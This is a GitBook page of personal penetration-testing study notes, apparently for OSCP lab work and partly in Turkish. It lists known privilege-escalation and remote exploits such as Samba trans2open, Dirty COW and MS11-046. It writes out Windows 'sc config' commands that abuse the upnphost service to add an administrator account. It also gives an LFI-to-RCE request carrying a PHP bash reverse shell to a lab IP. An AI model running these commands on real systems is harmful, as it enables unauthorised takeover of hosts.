m
m
messy security notes
Search…
m
m
messy security notes
security is an illision
Useful Blog Links
Windows
ad-101
MS17-010
SMB
Post Exploitation Tricks
DCOM/RPC
Basic Commands
SMB Enumeration
Linux
SUID Set Edilmiş servicectl Abuse Etme
sudoers dosyası bozulursa?
SSH Welcome Message and Banner
pkexec ve pkttyagent
vipw , vigr , visudo
IP Forwarding
İki NIC Arasında Port Yönlendirme
tasksel
LAMP
Find All SUID Bit
Linux Operatorler
IFS
Ssh Public Key Tricks
Local & Remote Port Forwarding
Linux Priv Esc
Static IP
POST EXPLOITATION
from external network to domain admin
post exp 2
OSCP
Temel Komutlar ve Araçlar
Zayıf Servisler
Örnek Bir Senaryo
Parola Saldırıları
ms17-010 python exploit
Full Interactive Shell
Notes*
Apache James Server 2.3.2 Exploit
windows exploit suggester
FreeBsd and Some PHP tricks
fundamental blog
Metasoloit & Meterpreter & msfvenom
at-tftp server 1.9
Tunneling and Forwarding
Common Exploits
Windows Servisler
Execute process as another user
Teorik
Authentication and Authorization
Kullanıcı Hesap Türleri ve Hakları
Kerberos
SYSTEM
Apache2
Bind9 Log
apache - basic auth - proxy
Buffer Overflow - BOF
BOF - Stack Based
BoF Links
BASH SCRIPTING
Samples
keepnote
Docker
Docker
Misc
50-cloud-init.yaml
Powered By GitBook
Common Exploits

Samba trans2open Overflow (Linux x86) / 10.11.1.22

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

dirty cow exploit

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

Webdav exploit

windows/iis/iis_webdav_upload_asp

linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8

samba servisine yönelik kullanılacak exploit

Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC

accesschk.exe

# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
Servisin Config Ayarlarını Görmek için
# sc qc upnphost
Servislerin izin kontrolleri
# accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
kullanımı yazılacak
Notlar
Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.
LFI to RCE
POST /section.php?page=php://input%00
[HTTP POST DATA]
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>

ms11-080

https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html
hackingandsecurity.blogspot.com
##
Previous
Tunneling and Forwarding
Next
Windows Servisler
Last modified 2yr ago
Copy link
Outline
Samba trans2open Overflow (Linux x86) / 10.11.1.22
dirty cow exploit
Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation
Webdav exploit
linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8
Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC
accesschk.exe
ms11-080